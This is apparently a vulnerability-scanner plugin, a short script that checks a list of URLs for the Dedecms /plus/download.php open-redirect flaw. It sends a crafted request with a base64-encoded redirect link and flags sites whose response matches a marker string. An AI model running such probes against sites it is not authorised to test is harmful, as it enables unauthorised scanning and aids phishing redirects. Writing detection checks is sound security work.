#request urls = array
#define payload = /plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20
#define bug = --STATUS OK--
#define info = /plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20 存在Dedecms /plus/download.php |URL跳转漏洞

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
